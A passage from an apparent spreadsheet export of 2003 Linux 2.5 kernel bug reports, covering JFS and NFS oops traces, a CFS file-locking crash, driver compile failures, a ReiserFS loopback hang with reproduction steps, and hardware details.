CONFIG_DEBUG_HIGHMEM=y CONFIG_KALLSYMS=y # CONFIG_DEBUG_SPINLOCK_SLEEP is not set CONFIG_FRAME_POINTER=y # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # # CONFIG_CRYPTO is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_X86_BIOS_REBOOT=y Problem Description: While attempting to run the test scenario described at http://ltp.sf.net/nfs, the following BUG was caught on the NFS server: ========================================= BUG at fs/jfs/namei.c:492 assert(!test_cflag(COMMIT_Nolink, ip)) ------------[ cut here ]------------ kernel BUG at fs/jfs/namei.c:492! invalid operand: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c0200999&gt;] Not tainted EFLAGS: 00010202 EIP is at jfs_unlink+0x239/0x47c eax: 00000044 ebx: df2e920c ecx: c052d4e8 edx: c0488f04 esi: f32e9ed8 edi: 00000000 ebp: f32e9ee8 esp: f32e9e88 ds: 007b es: 007b ss: 0068 Process nfsd (pid: 1845, threadinfo=f32e8000 task=f330ecc0) Stack: c0404900 c04048f1 000001ec c0404920 fffffff0 e7884690 e2387a64 df2e920c e238785c df2e927c e23878cc e238785c df2e926c 00000000 00000000 df2e9414 0000000e 3f032494 014bf620 0000b16c e2387a64 df2e9414 00000003 d4a974f4 Call Trace: [&lt;c015a8b8&gt;] vfs_unlink+0x118/0x160 [&lt;c01b9d22&gt;] nfsd_unlink+0x1e6/0x240 [&lt;c01b5f8d&gt;] nfsd_proc_remove+0x81/0x94 [&lt;c01b4b6a&gt;] nfsd_dispatch+0xde/0x199 [&lt;c03c92bd&gt;] svc_process+0x3cd/0x65a [&lt;c01b4918&gt;] nfsd+0x1ac/0x320 [&lt;c01b476c&gt;] nfsd+0x0/0x320 [&lt;c0108cf5&gt;] kernel_thread_helper+0x5/0xc Code: 0f 0b ec 01 f1 48 40 c0 83 c4 10 8b 45 dc 50 8b 55 e0 52 e8 ================================== Afterwards all NFS server activity ceased, but the server was still up and responsive to commands. Steps to reproduce: Execute the test scenario described in the NFS 2.5 Test Plan for approximately 2 hours.</t>
  </si>
  <si>
    <t>BUG at fs/jfs/jfs_imap.c:959 assert(le32_to_cpu(iagp-&gt;wmap[extno]) &amp; mask)</t>
  </si>
  <si>
    <t>2003-07-02 13:04 UTC</t>
  </si>
  <si>
    <t>2003-10-31 11:16 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 8.0 Hardware Environment: --------------------- # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 10 model name : Pentium III (Cascades) stepping : 1 cpu MHz : 702.267 cache size : 1024 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse bogomips : 1380.35 # cat /proc/meminfo MemTotal: 4306492 kB MemFree: 5564 kB Buffers: 384620 kB Cached: 3615820 kB SwapCached: 0 kB Active: 463532 kB Inactive: 3543660 kB HighTotal: 3440612 kB HighFree: 1280 kB LowTotal: 865880 kB LowFree: 4284 kB SwapTotal: 2097136 kB SwapFree: 2097136 kB Dirty: 56052 kB Writeback: 0 kB Mapped: 10548 kB Slab: 215456 kB Committed_AS: 22476 kB PageTables: 364 kB VmallocTotal: 114680 kB VmallocUsed: 2184 kB VmallocChunk: 112496 kB # mount /dev/sda3 on / type ext2 (rw) proc on /proc type proc (rw) devpts on /dev/pts type devpts (rw) /dev/sda1 on /boot type ext2 (rw) /dev/sdb1 on /nfsserver/ext3 type ext3 (rw) /dev/sdc1 on /nfsserver/jfs type jfs (rw) /dev/sdd1 on /nfsserver/reiserfs type reiserfs (rw) usbdevfs on /proc/bus/usb type usbdevfs (rw) Software Environment: # sh ./ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux vega 2.5.73 #3 SMP Mon Jun 23 16:18:55 CDT 2003 i686 unknown Gnu C 2.95.3 Gnu make 3.79.1 util-linux 2.11n mount 2.11z module-init-tools 2.4.12 e2fsprogs 1.26 jfsutils 1.0.15 xfsprogs 2.0.0 PPP 2.4.1 isdn4k-utils 3.1pre4 Linux C Library x 1 root root 1394238 Mar 23 2002 /lib/libc.so.6 Dynamic linker (ldd) 2.2.5 Procps 2.0.7 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0 CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_SEQUENCER=y # CONFIG_SND_SEQ_DUMMY is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set # CONFIG_SND_MPU401 is not set # # ISA devices # # CONFIG_SND_AD1848 is not set # CONFIG_SND_CS4231 is not set # CONFIG_SND_CS4232 is not set # CONFIG_SND_CS4236 is not set # CONFIG_SND_ES1688 is not set # CONFIG_SND_ES18XX is not set # CONFIG_SND_GUSCLASSIC is not set # CONFIG_SND_GUSEXTREME is not set # CONFIG_SND_GUSMAX is not set # CONFIG_SND_INTERWAVE is not set # CONFIG_SND_INTERWAVE_STB is not set # CONFIG_SND_OPTI92X_AD1848 is not set # CONFIG_SND_OPTI92X_CS4231 is not set # CONFIG_SND_OPTI93X is not set # CONFIG_SND_SB8 is not set # CONFIG_SND_SB16 is not set # CONFIG_SND_SBAWE is not set # CONFIG_SND_WAVEFRONT is not set # CONFIG_SND_CMI8330 is not set # CONFIG_SND_OPL3SA2 is not set # CONFIG_SND_SGALAXY is not set # CONFIG_SND_SSCAPE is not set # # PCI devices # # CONFIG_SND_ALI5451 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set # CONFIG_SND_EMU10K1 is not set # CONFIG_SND_KORG1212 is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set CONFIG_SND_INTEL8X0=y # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VX222 is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # PCMCIA devices # # CONFIG_SND_VXPOCKET is not set # CONFIG_SND_VXP440 is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=y # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y CONFIG_USB_BANDWIDTH=y # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=y # CONFIG_USB_OHCI_HCD is not set CONFIG_USB_UHCI_HCD=y # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set CONFIG_USB_STORAGE=y # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_DATAFAB is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # CONFIG_USB_STORAGE_HP8200e is not set # CONFIG_USB_STORAGE_SDDR09 is not set # CONFIG_USB_STORAGE_SDDR55 is not set # CONFIG_USB_STORAGE_JUMPSHOT is not set # # USB Human Interface Devices (HID) # # CONFIG_USB_HID is not set # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_AX8817X is not set # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # CONFIG_USB_GADGET is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_SLAB=y # CONFIG_DEBUG_IOVIRT is not set CONFIG_MAGIC_SYSRQ=y # CONFIG_DEBUG_SPINLOCK is not set CONFIG_DEBUG_HIGHMEM=y CONFIG_KALLSYMS=y # CONFIG_DEBUG_SPINLOCK_SLEEP is not set CONFIG_FRAME_POINTER=y # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # # CONFIG_CRYPTO is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_X86_BIOS_REBOOT=y Problem Description: While trying to remove files and directories created by the test scenario described at http://ltp.sf.net/nfs, the JFS removal stopped with this BUG: ========================================= diUpdatePMap: inode 45420 not marked as allocated in wmap! diUpdatePMap: inode 45420 not marked as allocated in pmap! BUG at fs/jfs/jfs_imap.c:959 assert(le32_to_cpu(iagp-&gt;wmap[extno]) &amp; mask) ------------[ cut here ]------------ kernel BUG at fs/jfs/jfs_imap.c:959! invalid operand: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c020a2b5&gt;] Not tainted EFLAGS: 00010202 EIP is at diFree+0x179/0x984 eax: 0000004e ebx: 0000002c ecx: 00000000 edx: c0488f04 esi: d11b0000 edi: d11b0800 ebp: d0f05f40 esp: d0f05ea0 ds: 007b es: 007b ss: 0068 Process rm (pid: 2053, threadinfo=d0f04000 task=f7652d80) Stack: c0405867 c0405855 000003bf c0405a00 cd19fdac c01ff774 d05bb000 d0e17440 d0e17000 00000020 d0f05f04 c013a9fd f7fff080 d138914c 00000286 0000002c d13891ac 00000118 d1254000 d1389354 00080000 00000000 00000000 0000000e Call Trace: [&lt;c01ff774&gt;] jfs_delete_inode+0x0/0x44 [&lt;c013a9fd&gt;] kfree+0x215/0x268 [&lt;c01ff7ab&gt;] jfs_delete_inode+0x37/0x44 [&lt;c0163703&gt;] generic_delete_inode+0x6b/0xd8 [&lt;c016388e&gt;] generic_drop_inode+0x12/0x20 [&lt;c0163904&gt;] iput+0x68/0x70 [&lt;c015a9f8&gt;] sys_unlink+0xf8/0x13c [&lt;c010aa03&gt;] syscall_call+0x7/0xb Code: 0f 0b bf 03 55 58 40 c0 83 c4 10 8b 4d c0 89 cb 0f b6 84 ce ================================== Afterwards all JFS file removal activity ceased, but the server was still up and responsive to commands. Steps to reproduce: Execute the test scenario described in the NFS 2.5 Test Plan until BugMe #866 occurs, then reboot the server and attempt to remove the files and directories created on the JFS partition.</t>
  </si>
  <si>
    <t>locking over NFS to CFS causes oops in other processes</t>
  </si>
  <si>
    <t>2.5.74, 2.5.73 (others not tested)</t>
  </si>
  <si>
    <t>2003-07-04 01:42 UTC</t>
  </si>
  <si>
    <t>Sampo Kellom</t>
  </si>
  <si>
    <t>2003-10-24 05:28 UTC</t>
  </si>
  <si>
    <t>Distribution: none, glibc-2.2.4, gcc-2.95.3 Hardware Environment: Sony VAIO PCG-C1MSX (mostly intel laptop w/Crusoe CPU, ide disk) Software Environment: cfs-1.4.0.beta2, backend storage on reiserfs Problem Description: cfs is an encrypted file system implemented as user land NFS server. However, it does not support locking. When I run an application that tries to perform locking, random oopses happen in other processes that are active at the moment. Usually (e.g. the make process in log below), but not always (e.g. the sonypid process), these appear to be accessing files in the cryptographic file system. THe process that attempted locking appears to survive. Once the oops happened on the lockd itself, but I am not sure if this was merely by random chance. The cryptographic filesystem appears to be otherwise stable: for example I can run makes all day on it as long as I do not run any program that tries to perform locking. The code snippet (executed by the dsproxy process in the log) that appears to trigger the behaviour: if ((fd = open("/mnt/cfs/foo/bar", O_RDONLY)) == -1) exit(1); lk.l_type = F_RDLCK; lk.l_whence = SEEK_SET; lk.l_start = 0; lk.l_len = 0; if (fcntl(fd, F_SETLKW, &amp;lk) == -1) exit(2); on a file located on the cryptographic filesystem. Here are some of the oopeses. Once this starts happening, usually tens or hundreds more follow until the machine becomes usuable. Jul 3 09:25:55 mju dsproxy[375]: 1024 2 39e8 160 Eh 212 7 Jul 3 09:25:55 mju dsproxy[375]: 00000000 ukwn Jul 3 09:27:22 mju kernel: nsm_mon_unmon: rpc failed, status=-13 Jul 3 09:27:22 mju kernel: lockd: cannot monitor 127.0.0.1 Jul 3 09:27:22 mju kernel: lockd: failed to monitor 127.0.0.1 Jul 3 09:35:30 mju kernel: nsm_mon_unmon: rpc failed, status=-13 Jul 3 09:35:30 mju kernel: lockd: cannot monitor 127.0.0.1 Jul 3 09:35:30 mju kernel: lockd: failed to monitor 127.0.0.1 Jul 3 10:05:27 mju -- MARK -- Jul 3 10:25:27 mju -- MARK -- Jul 3 10:45:27 mju -- MARK -- Jul 3 11:00:19 mju kernel: spurious 8259A interrupt: IRQ7. Jul 3 11:25:27 mju -- MARK -- Jul 3 11:26:25 mju kernel: sonypi: unknown event port1=0x08,port2=0x08 Jul 3 11:45:27 mju -- MARK -- Jul 3 11:59:36 mju kernel: Unable to handle kernel paging request at virtual address 00300bb0 Jul 3 11:59:36 mju kernel: printing eip: Jul 3 11:59:36 mju kernel: c012e545 Jul 3 11:59:36 mju kernel: *pde = 00000000 Jul 3 11:59:36 mju kernel: Oops: 0002 [#1] Jul 3 11:59:36 mju kernel: CPU: 0 Jul 3 11:59:36 mju kernel: EIP: 0060:[&lt;c012e545&gt;] Not tainted Jul 3 11:59:36 mju kernel: EFLAGS: 00010286 Jul 3 11:59:36 mju kernel: eax: c5100bb0 ebx: c1084300 ecx: c1084308 edx: 00300bb0 Jul 3 11:59:36 mju kernel: esi: c5100ba0 edi: 00000000 ebp: c1f6dd34 esp: c1f6dcb8 Jul 3 11:59:36 mju kernel: ds: 007b es: 007b ss: 0068 Jul 3 11:59:36 mju kernel: Process make (pid: 1021, threadinfo=c1f6c000 task=c1fbf860) Jul 3 11:59:36 mju kernel: Stack: c1084300 00000001 c0135410 c1084300 c1084300 c0135731 c5100ba0 c1084300 Jul 3 11:59:36 mju kernel: c1f6ddb0 c5100b14 00000c16 c1f6c000 00000000 00000001 00000000 c1084300 Jul 3 11:59:36 mju kernel: 4b87ad6e c0286584 c1f6dc90 00000000 c1f6dd08 c1f6dd08 00000000 00000000 Jul 3 11:59:36 mju kernel: Call Trace: [&lt;c0135410&gt;] [&lt;c0135731&gt;] [&lt;c0286584&gt;] [&lt;c0188831&gt;] [&lt;c01357a0&gt;] [&lt;c0186768&gt;] [&lt;c0183411&gt;] [&lt;c012fa4f&gt;] [&lt;c012fb57&gt;] [&lt;c014d9ab&gt;] [&lt;c014de49&gt;] [&lt;c014e355&gt;] [&lt;c014e470&gt;] [&lt;c014a6f0&gt;] [&lt;c012095a&gt;] [&lt;c014ac81&gt;] [&lt;c011d6a2&gt;] [&lt;c010a178&gt;] [&lt;c0108bff&gt;] Jul 3 11:59:36 mju kernel: Code: 89 02 c7 43 08 00 01 10 00 c7 41 04 00 02 20 00 c7 43 10 00 Jul 3 11:59:38 mju kernel: &lt;1&gt;Unable to handle kernel paging request at virtual address 01209958 Jul 3 11:59:38 mju kernel: printing eip: Jul 3 11:59:38 mju kernel: c012e545 Jul 3 11:59:38 mju kernel: *pde = 00000000 Jul 3 11:59:38 mju kernel: Oops: 0002 [#2] Jul 3 11:59:38 mju kernel: CPU: 0 Jul 3 11:59:38 mju kernel: EIP: 0060:[&lt;c012e545&gt;] Not tainted Jul 3 11:59:38 mju kernel: EFLAGS: 00010286 Jul 3 11:59:38 mju kernel: eax: ca83edf0 ebx: c1084350 ecx: c1084358 edx: 01209958 Jul 3 11:59:38 mju kernel: esi: ca83ede0 edi: 00000009 ebp: c89f3d34 esp: c89f3cb8 Jul 3 11:59:38 mju kernel: ds: 007b es: 007b ss: 0068 Jul 3 11:59:38 mju kernel: Process make (pid: 1034, threadinfo=c89f2000 task=c1fbf860) Jul 3 11:59:38 mju kernel: Stack: c1084350 0000001a c0135410 c1084350 c1084350 c0135731 ca83ede0 c1084350 Jul 3 11:59:38 mju kernel: c89f3db0 ca83ed54 000307f8 c89f2000 00000019 00000010 00000000 c10822f8 Jul 3 11:59:38 mju kernel: c10b6c10 c108f408 c1087488 c1083c70 c107a5a8 c107de88 c10787f8 c1077100 Jul 3 11:59:38 mju kernel: Call Trace: [&lt;c0135410&gt;] [&lt;c0135731&gt;] [&lt;c01357a0&gt;] [&lt;c0186768&gt;] [&lt;c0183411&gt;] [&lt;c0286584&gt;] [&lt;c014d9ab&gt;] [&lt;c014de49&gt;] [&lt;c014d4f9&gt;] [&lt;c014e355&gt;] [&lt;c014e470&gt;] [&lt;c014a6f0&gt;] [&lt;c014ac81&gt;] [&lt;c0108bff&gt;] Jul 3 11:59:38 mju kernel: Code: 89 02 c7 43 08 00 01 10 00 c7 41 04 00 02 20 00 c7 43 10 00 Jul 3 12:06:56 mju kernel: &lt;7&gt;nsm_mon_unmon: rpc failed, status=-13 Jul 3 12:06:56 mju kernel: lockd: cannot monitor 127.0.0.1 Jul 3 12:06:56 mju kernel: lockd: failed to monitor 127.0.0.1 Jul 3 12:07:00 mju kernel: nsm_mon_unmon: rpc failed, status=-13 Jul 3 12:07:00 mju kernel: lockd: cannot monitor 127.0.0.1 Jul 3 12:07:00 mju kernel: lockd: failed to monitor 127.0.0.1 Steps to reproduce: 1. install cfs-1.4.0.beta2 2. create encrypted directory with cmkdir 3. cattach the directory and cd into it 4. start in one window some process that accesses files in the encrypted directory 5. run in other window process that tries to perform locking on a file in the encrypted directory. You may need to repeat this a couple of times, but after less than 10 repetitions the oops should have been triggered. --Sampo</t>
  </si>
  <si>
    <t>sbp2 does not compile</t>
  </si>
  <si>
    <t>2.5.74</t>
  </si>
  <si>
    <t>2003-07-05 09:33 UTC</t>
  </si>
  <si>
    <t>2003-07-05 09:57 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 9.1 Hardware Environment: AMD Athlon 750 Software Environment: gcc 3.2 Problem Description: the module sbp2, part of ieee1394 does not compile Steps to reproduce: make config, select compile sbp-2 as module this generates the following output during "make modules": CC [M] drivers/ieee1394/sbp2.o drivers/ieee1394/sbp2.c: In function `sbp2util_create_command_orb_pool': drivers/ieee1394/sbp2.c:422: warning: implicit declaration of function `pci_map_single' drivers/ieee1394/sbp2.c:424: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) drivers/ieee1394/sbp2.c:424: (Each undeclared identifier is reported only once drivers/ieee1394/sbp2.c:424: for each function it appears in.) drivers/ieee1394/sbp2.c: In function `sbp2util_remove_command_orb_pool': drivers/ieee1394/sbp2.c:454: warning: implicit declaration of function `pci_unmap_single' drivers/ieee1394/sbp2.c:456: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) drivers/ieee1394/sbp2.c: In function `sbp2util_free_command_dma': drivers/ieee1394/sbp2.c:567: warning: implicit declaration of function `pci_unmap_page' drivers/ieee1394/sbp2.c:576: warning: implicit declaration of function `pci_unmap_sg' drivers/ieee1394/sbp2.c: In function `sbp2_start_device': drivers/ieee1394/sbp2.c:817: warning: implicit declaration of function `pci_alloc_consistent' drivers/ieee1394/sbp2.c:818: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:826: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:834: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:842: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:850: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:858: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:862: warning: implicit declaration of function `pci_free_consistent' drivers/ieee1394/sbp2.c: In function `sbp2_create_command_orb': drivers/ieee1394/sbp2.c:1837: warning: implicit declaration of function `pci_map_page' drivers/ieee1394/sbp2.c:1850: warning: implicit declaration of function `pci_map_sg' drivers/ieee1394/sbp2.c: In function `sbp2_link_orb_command': drivers/ieee1394/sbp2.c:2015: warning: implicit declaration of function `pci_dma_sync_single' drivers/ieee1394/sbp2.c:2017: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) drivers/ieee1394/sbp2.c: In function `sbp2_handle_status_write': drivers/ieee1394/sbp2.c:2447: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) drivers/ieee1394/sbp2.c: In function `sbp2scsi_complete_all_commands': drivers/ieee1394/sbp2.c:2639: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) drivers/ieee1394/sbp2.c: In function `sbp2scsi_abort': drivers/ieee1394/sbp2.c:2798: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) make[2]: *** [drivers/ieee1394/sbp2.o] Error 1 make[1]: *** [drivers/ieee1394] Error 2 make: *** [drivers] Error 2</t>
  </si>
  <si>
    <t>cirrusfb does not compile</t>
  </si>
  <si>
    <t>2003-07-05 10:59 UTC</t>
  </si>
  <si>
    <t>2005-08-15 17:32 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake 9.1 Hardware Environment: AMD Athlon 750 Software Environment: gcc 3.2 Problem Description: cirrusfb does not compile. Steps to reproduce: make config and select cirrus logich support as module. make modules</t>
  </si>
  <si>
    <t>2.5.73-bk7</t>
  </si>
  <si>
    <t>2003-07-06 00:57 UTC</t>
  </si>
  <si>
    <t>Barry K. Nathan</t>
  </si>
  <si>
    <t>2003-07-11 02:24 UTC</t>
  </si>
  <si>
    <t>ReiseFS developers team</t>
  </si>
  <si>
    <t>Distribution: Mandrake Cooker Hardware Environment: Intel motherboard with 1GHz Pentium III, 96MB RAM, 30GB IBM DeskStar 75GXP Software Environment: The 75GXP has a single partition (FAT32), which has some other files on it. The root partition is a ReiserFS filesystem inside a 1.9GB (or so) file on the FAT32 partition. Different gcc versions (2.95.3, Debian/Mandrake 3.3 variants, Debian 3.3.1-pre snapshots) and optimization levels (-Os, -O1, -O2) do not make any difference. Problem Description: Heavy disk activity on a ReiserFS loopback filesystem causes the process(es) accessing that filesystem to get stuck in D state. Sometimes the process(es) will get unstuck once and get stuck again, seemingly for good, if there is some network activity to the box. If I access a loopback filesystem that is formatted with ext2 or ext3 rather than reiserfs, I do not experience this bug. The problem started in 2.5.73-mm1 for the mm kernels, and 2.5.73-bk7 for the mainline kernels. The last kernel versions which I have checked are 2.5.73-mm3 and 2.5.74-bk2, and the bug is present in both of those kernels. I have no idea if the problem only happens with loopback. I have no other disks on this system and I have not set up any other test systems yet. Steps to reproduce: 1. dd if=/dev/zero bs=1024k count=2047 of=/path/to/loopback.img 2. mkreiserfs -f /path/to/loopback.img 3. mount -o /path/to/loopback.img /some/mount 4. cp ~luser/linux-2.5.74.tar.gz /some/mount 5. cd /some/mount 6. tar zvxf linux-2.5.74.tar.gz + The "v" isn't absolutely required, but it helps visually see if tar has really gotten stuck 7. rm -rf linux-2.5.74 8. Repeat step 6. On my system, the buggy kernels always get stuck here and never finish. If you need any more info, please ask.</t>
  </si>
  <si>
    <t>Reading from ATAPI CDROM crashes hard</t>
  </si>
  <si>
    <t>2.5.74-bk3</t>
  </si>
  <si>
    <t>2003-07-06 07:20 UTC</t>
  </si>
  <si>
    <t>2003-07-14 06:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing Hardware environment: Elitegroup K7S5A motherboard. lspci -vvv: 00:00.0 Host bridge: Silicon Integrated Systems [SiS] 735 Host (rev 01) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- Latency: 32 Region 0: Memory at d0000000 (32-bit, non-prefetchable) [size=16M] Capabilities: [c0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA+ AGP+ GART64- 64bit- FW- Rate=x1 00:01.0 PCI bridge: Silicon Integrated Systems [SiS] SiS 530 Virtual PCI-to-PCI bridge (AGP) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 Bus: primary=00, secondary=01, subordinate=01, sec-latency=64 I/O behind bridge: 0000b000-0000bfff Memory behind bridge: cfe00000-cfefffff Prefetchable memory behind bridge: bfc00000-cfcfffff BridgeCtl: Parity- SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- 00:02.0 ISA bridge: Silicon Integrated Systems [SiS] 85C503/5513 Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 00:02.2 USB Controller: Silicon Integrated Systems [SiS] SiS7001 USB Controller (rev 07) (prog-if 10 [OHCI]) Subsystem: Elitegroup Computer Systems: Unknown device 0a14 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (20000ns max), cache line size 08 Interrupt: pin D routed to IRQ 11 Region 0: Memory at cfffe000 (32-bit, non-prefetchable) [size=4K] 00:02.3 USB Controller: Silicon Integrated Systems [SiS] SiS7001 USB Controller (rev 07) (prog-if 10 [OHCI]) Subsystem: Elitegroup Computer Systems: Unknown device 0a14 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (20000ns max), cache line size 08 Interrupt: pin A routed to IRQ 11 Region 0: Memory at cffff000 (32-bit, non-prefetchable) [size=4K] 00:02.5 IDE interface: Silicon Integrated Systems [SiS] 5513 [IDE] (rev d0) (prog-if 80 [Master]) Subsystem: Silicon Integrated Systems [SiS] SiS5513 EIDE Controller (A,B step) Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 128 Region 4: I/O ports at ff00 [size=16] 00:02.7 Multimedia audio controller: Silicon Integrated Systems [SiS] SiS7012 PCI Audio Accelerator (rev a0) Subsystem: Elitegroup Computer Systems: Unknown device 0a14 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (13000ns min, 2750ns max) Interrupt: pin C routed to IRQ 11 Region 0: I/O ports at dc00 [size=256] Region 1: I/O ports at d800 [size=64] Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=55mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:03.0 Ethernet controller: Silicon Integrated Systems [SiS] SiS900 10/100 Ethernet (rev 90) Subsystem: Elitegroup Computer Systems: Unknown device 0a14 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 64 (13000ns min, 2750ns max) Interrupt: pin A routed to IRQ 11 Region 0: I/O ports at d400 [size=256] Region 1: Memory at cffdd000 (32-bit, non-prefetchable) [size=4K] Expansion ROM at cffa0000 [disabled] [size=128K] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ 